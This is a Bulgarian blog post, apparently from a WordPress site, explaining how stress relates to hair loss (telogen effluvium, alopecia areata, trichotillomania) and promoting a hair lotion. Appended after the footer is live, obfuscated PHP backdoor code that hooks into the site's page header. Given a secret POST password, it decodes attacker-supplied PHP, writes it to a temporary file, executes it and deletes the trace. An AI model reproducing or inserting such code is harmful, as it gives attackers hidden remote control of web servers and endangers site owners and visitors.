Има ли връзка между косопад и стрес? | Косопад

Има ли връзка между косопад и стрес?

косопад и стресВ последните години все по – често стресът е определян като основен причинител на косопад. Различните стресови ситуации причиняват това медицинско състояние и създават проблеми на много хора. Засегнати са мъже, жени и деца, въпреки че причините могат да бъдат различни.

Специалистите уточняват, че косопад като следствие от стрес се проявява обичайно от 3 до 6 месеца след преживяване на шока – болест, мъка, прекомерна радост, операция, бременност и така нататък. Ако забележите симптоми задължително трябва да посетите лекар, защото той ще открие какво е довело до появата на тези симптоми.

Видове косопад от стрес

Телогенен ефлувиум. Засяга окосмението по главата и тялото. Засегнатите участъци оплешивяват внезапно, като най – много коса пада при миене или ресане. Дължи се на факта, че в този момент необичайно голям брой косми изпадат в летаргия и на тяхно място не се раждат нови.

Алопеция ареата. Счита се, че основната причина е срив в имунната система. Не е напълно ясно откъде се получава, но в крайна сметка тялото нарочва космите за основен виновник и блокира работата на космените фоликули.

Трихотиломания. Това е интересен вид психическо разстройство, при което заболелите сами си причиняват механичен косопад чрез дърпане и късане на космите. Изпитват силно желание да се скубят, а според психолозите това е защитна реакция за премахване на натрупания стрес.

Хубавото е, че косопад от стрес се лекува в почти всички случаи. Космите заповат да се възстановяват сами, но трябва да мине известен период. През това време е подходящо да използвате лосионът „Ефект – 2”, който подхранва корените и спомага работата на космените фоликули.

21. октомври 2013 12:36:27 от Косопад
Категории: Косопад – Статии | Етикети: | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}